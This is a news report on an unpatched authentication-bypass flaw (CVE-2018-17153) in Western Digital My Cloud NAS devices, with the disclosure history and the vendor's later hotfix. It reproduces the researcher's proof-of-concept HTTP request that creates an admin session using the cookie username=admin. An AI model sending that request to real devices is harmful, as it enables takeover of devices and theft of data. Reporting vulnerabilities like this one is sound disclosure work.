A vulnerability in Western Digital My Cloud network-attached storage (NAS) that allows an attacker to bypass authentication and take control of the device with administrator permissions remains unpatched almost a year and a half after being reported initially.
The security bug, which received the identification number CVE-2018-17153 on Tuesday, was discovered by security researcher Remco Vermeulen at Securify on April 9, 2017, and reported to Western Digital the next day.
The researcher tested the flaw on a Western Digital My Cloud model WDBCTL0020HWT updated to firmware version 2.30.172. The problem is not limited to this model, though, because My Cloud products share the same code.
The authentication process to a My Cloud device generates a server-side session that is bound to the user's IP address. After this step, authenticated CGI modules can be called by sending the cookie 'username=admin' in an HTTP request.
"It was found that it is possible for an unauthenticated attacker to create a valid session without requiring to authenticate. The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when invoked with the parameter flag equal to 1," Vermeulen explains.
If the attacker sets the 'username=admin' cookie, they get admin-level access to the device.
The researcher published a proof-of-concept code and detailed the steps to get control over a My Cloud NAS.
An attacker has first to set an admin session bound to their IP address.
POST /cgi-bin/network_mgr.cgi HTTP/1.1 Host: wdmycloud.local Content-Type: application/x-www-form-urlencoded Cookie: username=admin Content-Length: 23 cmd=cgi_get_ipv6&flag=1
The next step is to call a remote target system and authenticate using the 'username=admin' cookie.
Vermeulen told BleepingComputer that compromising My Cloud NAS systems can be done via cross-site scripting (CSRF) attacks in malvertising campaigns, allowing the attacker to target devices that are not reachable over the internet.
Vermeulen is not the only one who found the vulnerability. Last year, security group Exploiteers disclosed it at Def Con security conference.
The group says they contacted Western Digital about it but the company refused to acknowledge or fix the issue. As a result, Exploiteer member Zenofex built a Metasploit module that exploits the vulnerability for it.
In August, the group made a video that demonstrates two vulnerabilities, one of them being the authentication bypass CVE-2018-17153:
At the moment of writing, there are about 1,870 Western Digital My Cloud NAS systems connected online, most of them in Europe. The number keeps changing, though.
NAS devices are used for backup purposes, so they are very likely to contain data that is valuable to the user.
With at least two researchers reporting the vulnerability more than a year ago, proof-of-concept code freely available, and an exploitation module at the ready, hackers are likely to focus on Western Digital products, as they seem ripe for ransomware attacks.
Update [09/19/18 16:31]: Western Digital contacted BleepingComputer on Twitter to inform that they are currently in the final stage of preparing a firmware update that will address CVE-2018-17153.
"We expect to post the update on our technical support site at https://support.wdc.com/ within a few weeks," the company says in an announcement published today, where they recommend owners of NAS devices to enable automatic updates and not to expose the device to the internet directly.
Update [09/21/18]: Western Digital now has a hotfix for the My Cloud authentication bypass vulnerability.